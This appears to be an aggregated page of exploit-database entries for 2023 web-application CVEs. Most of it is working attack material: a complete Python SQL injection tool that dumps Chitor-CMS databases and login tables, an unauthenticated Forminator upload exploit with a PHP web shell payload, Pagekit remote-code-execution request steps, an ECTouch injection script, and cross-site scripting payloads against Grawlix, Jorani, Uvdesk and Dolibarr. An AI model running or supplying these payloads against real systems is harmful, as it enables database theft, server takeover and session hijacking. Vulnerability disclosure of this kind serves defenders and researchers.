Chitor-CMS before v1.1.2 was discovered to contain multiple SQL injection vulnerabilities.

**Chitor-CMS v1.1.2 - Pre-Auth SQL Injection**

**Platform:****PHP**

**Date:****2023-04-20**

  

    #!/usr/bin/python3
    
    #######################################################
    #                                                     # 
    #  Exploit Title: Chitor-CMS v1.1.2 - Pre-Auth SQL Injection          #
    #  Date: 2023/04/13               #
    #  ExploitAuthor: msd0pe                                  #
    #  Project: https://github.com/waqaskanju/Chitor-CMS  #
    #  My Github: https://github.com/msd0pe-1             #
    #  Patched the 2023/04/16: 69d3442 commit             #
    #                                                     #
    #######################################################
    
    __description__ = 'Chitor-CMS < 1.1.2 Pre-Auth SQL Injection.'
    __author__ = 'msd0pe'
    __version__ = '1.1'
    __date__ = '2023/04/13'
    
    class bcolors:
        PURPLE = '\033[95m'
        BLUE = '\033[94m'
        GREEN = '\033[92m'
        OCRA = '\033[93m'
        RED = '\033[91m'
        CYAN = '\033[96m'
        ENDC = '\033[0m'
        BOLD = '\033[1m'
        UNDERLINE = '\033[4m'
    
    class infos:
        INFO = "[" + bcolors.OCRA + bcolors.BOLD + "?" + bcolors.ENDC + bcolors.ENDC + "] "
        ERROR = "[" + bcolors.RED + bcolors.BOLD + "X" + bcolors.ENDC + bcolors.ENDC + "] "
        GOOD = "[" + bcolors.GREEN + bcolors.BOLD + "+" + bcolors.ENDC + bcolors.ENDC + "] "
        PROCESS = "[" + bcolors.BLUE + bcolors.BOLD + "*" + bcolors.ENDC + bcolors.ENDC + "] "
    
    import re
    import requests
    import optparse
    from prettytable import PrettyTable
    
    def DumpTable(url, database, table):
        header = {"User-Agent": "5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"}
        x = PrettyTable()
        columns = []
        payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2Ccolumn_name))%2C0x716a6b6271) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=\"" + table + "\" AND table_schema=\"" + database + "\"-- -"
        u = requests.get(url + payload, headers=header)
        try:
            r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text)
            r = r[0].replace('\"',"").split(',')
            if r == []:
                pass
            else:
                for i in r:
                    columns.append(i)
                    pass
        except:
            pass
        x.field_names = columns
        payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2C " + str(columns).replace("[","").replace("]","").replace("\'","").replace(" ","") + "))%2C0x716a6b6271) FROM " + database + "." + table + "-- -"
        u = requests.get(url + payload, headers=header)
        try:
            r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text)
            r = r[0].replace('\"',"").split(',')
            if r == []:
                pass
            else:
                for i in r:
                    i = i.split("xzmdpl")
                    x.add_rows([i])
        except ValueError:
            r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text)
            r = r[0].replace('\"',"").split(',')
            if r == []:
                pass
            else:
                for i in r:
                    i = i.split("xzmdpl")
                    i.append("")
                    x.add_rows([i])        
        print(x)
    
    def ListTables(url, database):
        header = {"User-Agent": "5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"}
        x = PrettyTable()
        x.field_names = ["TABLES"]
        payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2Ctable_name))%2C0x716a6b6271) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x" + str(database).encode('utf-8').hex() + ")-- -"
        u = requests.get(url + payload, headers=header)
        try:
            r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text)
            r = r[0].replace('\"',"").split(',')
            if r == []:
                pass
            else:
                for i in r:
                    x.add_row([i])
        except:
            pass
        print(x)
    
    def ListDatabases(url):
        header = {"User-Agent": "5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"}
        x = PrettyTable()
        x.field_names = ["DATABASES"]
        payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2Cschema_name))%2C0x716a6b6271) FROM INFORMATION_SCHEMA.SCHEMATA-- -"
        u = requests.get(url + payload, headers=header)
        try:
            r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text)
            r = r[0].replace('\"',"").split(',')
            if r == []:
                pass
            else:
                for i in r:
                    x.add_row([i])
        except:
            pass
        print(x)
    
    def Main():
        Menu = optparse.OptionParser(usage='python %prog [options]', version='%prog ' + __version__)
        Menu.add_option('-u', '--url', type="str", dest="url", help='target url')
        Menu.add_option('--dbs', action="store_true", dest="l_databases", help='list databases')
        Menu.add_option('-D', '--db', type="str", dest="database", help='select a database')
        Menu.add_option('--tables', action="store_true", dest="l_tables", help='list tables')
        Menu.add_option('-T', '--table', type="str", dest="table", help='select a table')
        Menu.add_option('--dump', action="store_true", dest="dump", help='dump the content')
        (options, args) = Menu.parse_args()
    
        Examples = optparse.OptionGroup(Menu, "Examples", """python3 chitor1.1.py -u http://127.0.0.1 --dbs
                                                             python3 chitor1.1.py -u http://127.0.0.1 -D chitor_db --tables
                                                             python3 chitor1.1.py -u http://127.0.0.1 -D chitor_db -T login --dump
        """)
        Menu.add_option_group(Examples)
    
        if len(args) != 0 or options == {'url': None, 'l_databases': None, 'database': None, 'l_tables': None, 'table': None, 'dump': None}:
            Menu.print_help()
            print('')
            print('  %s' % __description__)
            print('  Source code put in public domain by ' + bcolors.PURPLE + bcolors.BOLD + 'msd0pe' + bcolors.ENDC + bcolors.ENDC + ',' + bcolors.RED + bcolors.BOLD + 'no Copyright' + bcolors.ENDC + bcolors.ENDC)
            print('  Any malicious or illegal activity may be punishable by law')
            print('  Use at your own risk')
    
        elif len(args) == 0:
            try:
                if options.url != None:
                    if options.l_databases != None:
                        ListDatabases(options.url)
                    if options.database != None:
                        if options.l_tables != None:
                            ListTables(options.url, options.database)
                        if options.table != None:
                            if options.dump != None:
                                DumpTable(options.url, options.database, options.table)
            except:
                print("Unexpected error")
    
    if __name__ == '__main__':
        try:
            Main()
    
        except KeyboardInterrupt:
            print()
            print(infos.PROCESS + "Exiting...")
            print()
            exit(1)

CVE-2023-31714: OffSec’s Exploit Database Archive

The Forminator plugin for WordPress is vulnerable to arbitrary file uploads due to file type validation occurring after a file has been uploaded to the server in the upload_post_image() function in versions up to, and including, 1.24.6. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.

    # Exploit Title: WordPress Plugin Forminator 1.24.6 - Unauthenticated Remote Command Execution
    # Date: 2023-07-20
    # Exploit Author: Mehmet Kelepçe
    # Vendor Homepage: https://wpmudev.com/project/forminator-pro/
    # Software Link: https://wordpress.org/plugins/forminator/
    # Version: 1.24.6
    # Tested on: PHP - Mysql - Apache2 - Windows 11
    
    HTTP Request and vulnerable parameter:
    -------------------------------------------------------------------------
    POST /3/wordpress/wp-admin/admin-ajax.php HTTP/1.1
    Host: localhost
    Content-Length: 1756
    sec-ch-ua:
    Accept: */*
    Content-Type: multipart/form-data;
    boundary=----WebKitFormBoundaryTmsFfkbegmAjomne
    X-Requested-With: XMLHttpRequest
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
    AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199
    Safari/537.36
    sec-ch-ua-platform: ""
    Origin: http://localhost
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: http://localhost/3/wordpress/2023/01/01/merhaba-dunya/
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: wp-settings-time-1=1689794282;
    wordpress_test_cookie=WP%20Cookie%20check; wp_lang=tr_TR
    Connection: close
    
    .
    .
    .
    .
    .
    
    ------WebKitFormBoundaryTmsFfkbegmAjomne
    Content-Disposition: form-data; name="postdata-1-post-image";
    filename="mehmet.php"
    Content-Type: application/octet-stream
    
    <?php
    $_GET['function']($_GET['cmd']);
    ?>
    
    
    
    Source Code:
    wp-content/plugins/forminator/library/modules/custom-forms/front/front-render.php:
    --------------------------------------------------------------------
            public function has_upload() {
    $fields = $this->get_fields();
    
    if ( ! empty( $fields ) ) {
    foreach ( $fields as $field ) {
    if ( 'upload' === $field['type'] || 'postdata' === $field['type'] ) {
    return true;
    }
    }
    }
    
    return false;
    }
    Vulnerable parameter: postdata-1-post-image
    
    and
    
    
    Source code:
    wp-content/plugins/forminator/library/fields/postdata.php:
    -------------------------------------------------------------------
    if ( ! empty( $post_image ) && isset( $_FILES[ $image_field_name ] ) ) {
    if ( isset( $_FILES[ $image_field_name ]['name'] ) && ! empty(
    $_FILES[ $image_field_name ]['name'] ) ) {
    $file_name = sanitize_file_name( $_FILES[ $image_field_name ]['name'] );
    $valid     = wp_check_filetype( $file_name );
    
    if ( false === $valid['ext'] || ! in_array( $valid['ext'],
    $this->image_extensions ) ) {
    $this->validation_message[ $image_field_name ] = apply_filters(
    'forminator_postdata_field_post_image_nr_validation_message',
    esc_html__( 'Uploaded file\'s extension is not allowed.', 'forminator' ),
    $id
    );
    }
    }
    }
    
    Vulnerable function: $image_field_name
    -------------------------------------------------------------------------
    
    Payload file: mehmet.php
    <?php
    $_GET['function']($_GET['cmd']);
    ?>
    -------------------------------------------------------------------------

CVE-2023-4596: OffSec’s Exploit Database Archive

Grawlix version 1.5.1 suffers from a cross site scripting vulnerability.

    ## Title: grawlix-1.5.1 XSS-Reflected## Author: nu11secur1ty## Date: 08/29/2023## Vendor: https://getgrawlix.com/## Software:## Reference: https://portswigger.net/web-security/cross-site-scripting## Description:The value of the ref request parameter is copied into the value of anHTML tag attribute which is encapsulated in double quotation marks.The payload vy7tu"><script>alert(1)</script>e284ovbptuv was submittedin the ref parameter. This input was echoed unmodified in theapplication's response. The attacker can steal PHPSESSID cookie andcan trick the victim into visiting his or some other dangerous URLaddress.STATUS: HIGH-Vulnerability[+]Exploit:```POSTGET /grawlix-1.5.1/grawlix-cms-1.5.1/_admin/panl.login.php?grlx_xss_token=&ref=book.view.phpvy7tu%22%3E%3Cscript%3Ealert(%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65)%3C%2fscript%3Ehttp://pornhub.com&username=UXBhcRhk&extra=y9R%21m8c%21W6&submit=LoginHTTP/1.1Host: localhostsec-ch-ua:sec-ch-ua-mobile: ?0sec-ch-ua-platform: ""Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=oq08tie8elf34amgmti9e8bel2Connection: close```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/getgrawlix/getgrawlix-1.5.1)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/08/grawlix-cms-151-xss-reflected.html)## Time spend:00:27:00

Grawlix 1.5.1 Cross Site Scripting

An issue in Pagekit pagekit v.1.0.18 alows a remote attacker to execute arbitrary code via thedownloadAction and updateAction functions in UpdateController.php

**Problem**

**There is a logical flaw that leads to obtaining shell access.**

**Technical Details**

*   Pagekit version: 1.0.18
*   Webserver: nginx
*   Database: mysql
*   PHP Version: 7.4

Vulnerability Path:  
app/installer/src/Controller/UpdateController.php  
Lines 32-72: downloadAction and updateAction functions  
The downloadAction function retrieves a file from a remote location to the local system.  
The updateAction function reads the downloaded file.  
Within it, the SelfUpdater function is called at app/installer/src/SelfUpdater.php.  
It includes the app/installer/requirements.php file from the remotely fetched file.  
This can lead to remote code execution.  
Based on this, constructing a zip file as follows:  
pagekit.zip

The data package is as follows

    POST /index.php/admin/system/update/download HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Connection: keep-alive
    Content-Length: 58
    Content-Type: application/x-www-form-urlencoded
    Cookie: Administrator's Cookie
    Host: localhost
    Referer: http://localhost/index.php/admin/system/update/download
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
    
    url=constructed_zip_file&_csrf=4eb8d50f82ebae5b1fa16d5177d99ea7d740a8b2
    

    POST /index.php/admin/system/update/update HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cache-Control: max-age=0
    Connection: keep-alive
    Content-Length: 46
    Content-Type: application/x-www-form-urlencoded
    Cookie: Administrator's Cookie
    Host: localhost
    Referer: http://localhost /index.php/admin/system/update/update
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
    
    _csrf=4eb8d50f82ebae5b1fa16d5177d99ea7d740a8b2

CVE-2023-41005: There is a logical flaw that leads to obtaining shell access. · Issue #977 · pagekit/pagekit

ECTouch v2 was discovered to contain a SQL injection vulnerability via the $arr['id'] parameter at \default\helpers\insert.php.

#SQL Injection Vulnerability in ECTouch v2

###Vulnerability Position

In the insert\_bought\_notes function on line 285 in the \\ectouch-main\\include\\apps\\default\\helpers\\insert.php file, the incoming $arr\['id'\] parameter is not verified, resulting in a sql injection vulnerability.

###POC

Use python to write scripts for vulnerability verification.

#!/usr/bin/python
\# -\*- coding: utf-8 -\*-
\# @Author : qyg
\# @File : sqli check for ECTouch v2
\# @function : Detect for SQL injection vulnerabilities in ECTouch.

import requests,re

#your target
target \= 'http://127.0.0.1/'

payload \= '/index.php?m=default&c=user&a=register&u=0'

url \= target + payload

headers \= {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36 Edg/111.0.1661.54',
    'Referer': '554fcae493e564ee0dc75bdf2ebf94cabought\_notes|a:1:{s:2:"id";s:49:"0&&updatexml(1,concat(0x7e,(database()),0x7e),1)#";}'
}

response \= requests.get(url, headers\=headers)

print(response.text)

match \= re.search('XPATH syntax error: \\'~(.\*)~\\'',response.text)

if match:
    print("There is SQL injection vulnerability, and you are currently using the following database:" + match.group(1))

Running results:

CVE-2023-39560: GitHub - Luci4n555/cve_ectouch: detail

Jorani version 1.0.3 suffers from a cross site scripting vulnerability.

    ## Title: Jorani-v1.0.3-©2014-2023-Benjamin-BALET-XSS-Reflected-Information-Disclosure## Author: nu11secur1ty## Date: 08/27/2023## Vendor: https://jorani.org/## Software: https://demo.jorani.org/session/login## Reference: https://portswigger.net/web-security/cross-site-scripting## Reference: https://portswigger.net/web-security/information-disclosure## Description:The value of the `language request` parameter is copied into aJavaScript string which is encapsulated in double quotation marks. Thepayload 75943";alert(1)//569 was submitted in the language parameter.This input was echoed unmodified in the application's response.The attacker can modify the token session and he can discoversensitive information for the server.STATUS: HIGH-Vulnerability[+]Exploit:```POSTPOST /session/login HTTP/1.1Host: demo.jorani.orgAccept-Encoding: gzip, deflateAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111Safari/537.36Connection: closeCache-Control: max-age=0Cookie: csrf_cookie_jorani=9b4b02ece59e0f321cd0324a633b5dd2;jorani_session=fbc630d2510ffdd2a981ccfe97301b1b90ab47dc#ATTACKOrigin: http://demo.jorani.orgUpgrade-Insecure-Requests: 1Referer: http://demo.jorani.org/session/loginContent-Type: application/x-www-form-urlencodedSec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116", "Chromium";v="116"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0Content-Length: 183csrf_test_jorani=9b4b02ece59e0f321cd0324a633b5dd2&last_page=session%2Flogin&language=en-GBarh5l%22%3e%3cscript%3ealert(document.cookie)%3c%2fscript%3ennois&login=bbalet&CipheredValue=```[+]Response:```HTTPHTTP/1.1 200 OKdate: Sun, 27 Aug 2023 06:03:04 GMTcontent-type: text/html; charset=UTF-8Content-Length: 681server: Apachex-powered-by: PHP/8.2expires: Thu, 19 Nov 1981 08:52:00 GMTcache-control: no-store, no-cache, must-revalidatepragma: no-cacheset-cookie: csrf_cookie_jorani=9b4b02ece59e0f321cd0324a633b5dd2;expires=Sun, 27 Aug 2023 08:03:04 GMT; Max-Age=7200; path=/;SameSite=Strictset-cookie: jorani_session=9ae823ffa74d722c809f6bda69954593483f2cfd;expires=Sun, 27 Aug 2023 08:03:04 GMT; Max-Age=7200; path=/; HttpOnly;SameSite=Laxlast-modified: Sun, 27 Aug 2023 06:03:04 GMTvary: Accept-Encodingcache-control: private, no-cache, no-store, proxy-revalidate,no-transform, must-revalidatepragma: no-cachex-iplb-request-id: 3E497A1D:118A_D5BA2118:0050_64EAE718_12C0:1FBA1x-iplb-instance: 27474connection: close<div style="border:1px solid #990000;padding-left:20px;margin:0 0 10px 0;"><h4>A PHP Error was encountered</h4><p>Severity: 8192</p><p>Message:  strlen(): Passing null to parameter #1 ($string) of typestring is deprecated</p><p>Filename: controllers/Connection.php</p><p>Line Number: 126</p></div><div style="border:1px solid #990000;padding-left:20px;margin:0 0 10px 0;"><h4>A PHP Error was encountered</h4><p>Severity: Warning</p><p>Message:  Cannot modify header information - headers already sentby (output started at/home/decouvric/demo.jorani.org/system/core/Exceptions.php:272)</p><p>Filename: helpers/url_helper.php</p><p>Line Number: 565</p></div>```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Jorani/2023/Jorani-v1.0.3-%C2%A92014-2023-Benjamin-BALET-XSS-Reflected-Information-Disclosure)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/08/jorani-v103-2014-2023-benjamin-balet.html)## Time spend:01:35:00

Jorani 1.0.3 Cross Site Scripting

Uvdesk version 1.1.4 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Uvdesk 1.1.4 - Stored XSS (Authenticated)# Date: 14/08/2023# Exploit Author: Hubert Wojciechowski# Contact Author: hub.woj12345@gmail.com# Vendor Homepage: https://www.uvdesk.com/# Software Link: https://github.com/MegaTKC/AeroCMS# Version: 1.1.4# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23# Authenticated user privilages to tickets. User can send XSS to admin or other user and stolen sesssion.## Example XSS Stored in new ticket-----------------------------------------------------------------------------------------------------------------------Param: reply-----------------------------------------------------------------------------------------------------------------------Req-----------------------------------------------------------------------------------------------------------------------POST /uvdesk/public/en/member/thread/add/1 HTTP/1.1Host: 127.0.0.1Content-Length: 812Cache-Control: max-age=0sec-ch-ua: sec-ch-ua-mobile: ?0sec-ch-ua-platform: ""Upgrade-Insecure-Requests: 1Origin: http://127.0.0.1Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryXCjJcGbgZxZWLsSkUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.110 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://127.0.0.1/uvdesk/public/en/member/ticket/view/1Accept-Encoding: gzip, deflateAccept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7Cookie: uv-sidebar=0; PHPSESSID=4b0j3r934245lpssq5lil3edm3Connection: close------WebKitFormBoundaryXCjJcGbgZxZWLsSkContent-Disposition: form-data; name="threadType"forward------WebKitFormBoundaryXCjJcGbgZxZWLsSkContent-Disposition: form-data; name="status"------WebKitFormBoundaryXCjJcGbgZxZWLsSkContent-Disposition: form-data; name="subject"aaaa------WebKitFormBoundaryXCjJcGbgZxZWLsSkContent-Disposition: form-data; name="to[]"test@local.host------WebKitFormBoundaryXCjJcGbgZxZWLsSkContent-Disposition: form-data; name="reply"%3Cp%3E%3Cembed+src%3D%22data%3Aimage%2Fsvg%2Bxml%3Bbase64%2CPHN2ZyB4bWxuczpzdmc9Imh0dH+A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv+MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs+aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw+IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI%2BYWxlcnQoIlh+TUyIpOzwvc2NyaXB0Pjwvc3ZnPg%3D%3D%22+type%3D%22image%2Fsvg%2Bxml%22+width%3D%22300%22+height%3D%22150%22%3E%3C%2Fembed%3E%3C%2Fp%3E------WebKitFormBoundaryXCjJcGbgZxZWLsSkContent-Disposition: form-data; name="pic"; filename=""Content-Type: application/octet-stream------WebKitFormBoundaryXCjJcGbgZxZWLsSkContent-Disposition: form-data; name="nextView"stay------WebKitFormBoundaryXCjJcGbgZxZWLsSk-------------------------------------------------------------------------------------------------------------------------Res:-----------------------------------------------------------------------------------------------------------------------HTTP/1.1 302 FoundDate: Mon, 14 Aug 2023 11:33:26 GMTServer: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29X-Powered-By: PHP/7.4.29Cache-Control: max-age=0, must-revalidate, privateLocation: /uvdesk/public/en/member/ticket/view/1Access-Control-Allow-Origin: *Access-Control-Allow-Methods: GET,POST,PUT,OPTIONSAccess-Control-Allow-Headers: Access-Control-Allow-OriginAccess-Control-Allow-Headers: AuthorizationAccess-Control-Allow-Headers: Content-TypeX-Debug-Token: bf1b73X-Debug-Token-Link: http://127.0.0.1/uvdesk/public/_profiler/bf1b73X-Robots-Tag: noindexExpires: Mon, 14 Aug 2023 11:33:26 GMTSet-Cookie: sf_redirect=%7B%22token%22%3A%22bf1b73%22%2C%22route%22%3A%22helpdesk_member_add_ticket_thread%22%2C%22method%22%3A%22POST%22%2C%22controller%22%3A%7B%22class%22%3A%22Webkul%5C%5CUVDesk%5C%5CCoreFrameworkBundle%5C%5CController%5C%5CThread%22%2C%22method%22%3A%22saveThread%22%2C%22file%22%3A%22C%3A%5C%5Cxampp2%5C%5Chtdocs%5C%5Cuvdesk%5C%5Cvendor%5C%5Cuvdesk%5C%5Ccore-framework%5C%5CController%5C%5CThread.php%22%2C%22line%22%3A44%7D%2C%22status_code%22%3A302%2C%22status_text%22%3A%22Found%22%7D; path=/; httponly; samesite=laxConnection: closeContent-Type: text/html; charset=UTF-8Content-Length: 398<!DOCTYPE html><html>    <head>        <meta charset="UTF-8" />        <meta http-equiv="refresh" content="0;url='/uvdesk/public/en/member/ticket/view/1'" />        <title>Redirecting to /uvdesk/public/en/member/ticket/view/1</title>    </head>    <body>        Redirecting to <a href="/uvdesk/public/en/member/ticket/view/1">/uvdesk/public/en/member/ticket/view/1</a>.    </body></html>-----------------------------------------------------------------------------------------------------------------------Redirect and view response:-----------------------------------------------------------------------------------------------------------------------HTTP/1.1 200 OKDate: Mon, 14 Aug 2023 11:44:14 GMTServer: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29X-Powered-By: PHP/7.4.29Cache-Control: max-age=0, must-revalidate, privateAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: GET,POST,PUT,OPTIONSAccess-Control-Allow-Headers: Access-Control-Allow-OriginAccess-Control-Allow-Headers: AuthorizationAccess-Control-Allow-Headers: Content-TypeX-Debug-Token: 254ce8X-Debug-Token-Link: http://127.0.0.1/uvdesk/public/_profiler/254ce8X-Robots-Tag: noindexExpires: Mon, 14 Aug 2023 11:44:14 GMTConnection: closeContent-Type: text/html; charset=UTF-8Content-Length: 300607<!DOCTYPE html><html>    <head>        <title>#1 vvvvvvvvvvvvvvvvvvvvv</title>[...]<p><embed src="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" width="300" height="150"></embed></p>[...]-----------------------------------------------------------------------------------------------------------------------XSS execute, we can reply ticket to victim. This payload can use in new articles, tickets, all application.

Uvdesk 1.1.4 Cross Site Scripting

Dolibarr version 17.0.1 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Dolibarr Version 17.0.1 - Stored XSS# Dork: # Date: 2023-08-09# Exploit Author: Furkan Karaarslan# Category : Webapps# Vendor Homepage: http://127.0.0.1/dolibarr-17.0.1/htdocs/user/note.php# Version: 17.0.1 (REQUIRED)# Tested on: Windows/Linux# CVE : -----------------------------------------------------------------------------RequestsPOST /dolibarr-17.0.1/htdocs/user/note.php HTTP/1.1Host: 127.0.0.1Content-Length: 599Cache-Control: max-age=0sec-ch-ua: sec-ch-ua-mobile: ?0sec-ch-ua-platform: ""Upgrade-Insecure-Requests: 1Origin: http://127.0.0.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://127.0.0.1/dolibarr-17.0.1/htdocs/user/note.php?action=editnote_public&token=4b1479ad024e82d298b395bfab9b1916&id=1Accept-Encoding: gzip, deflateAccept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7Cookie: 5c8ccd93504819395bd9eb83add769eb=g6sujc3ss8cj53cvk84qv0jgol; f758a1cd0925196cd7746824e3df122b=u04rsmdqgrdpr2kduo49gl0rmh; DOLSESSID_18109f368bbc82f2433d1d6c639db71bb97e2bd1=sud22bsu9sbqqc4bgcloki2ehtConnection: closetoken=4b1479ad024e82d298b395bfab9b1916&action=setnote_public&token=4b1479ad024e82d298b395bfab9b1916&id=1&note_public=%3Ca+onscrollend%3Dalert%281%29+style%3D%22display%3Ablock%3Boverflow%3Aauto%3Bborder%3A1px+dashed%3Bwidth%3A500px%3Bheight%3A100px%3B%22%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cspan+id%3Dx%3Etest%3C%2Fspan%3E%3C%2Fa%3E&modify=De%C4%9Fi%C5%9Ftir

Dolibarr 17.0.1 Cross Site Scripting

Global Multi School Management System Express version 1.0 suffers from a remote SQL injection vulnerability.

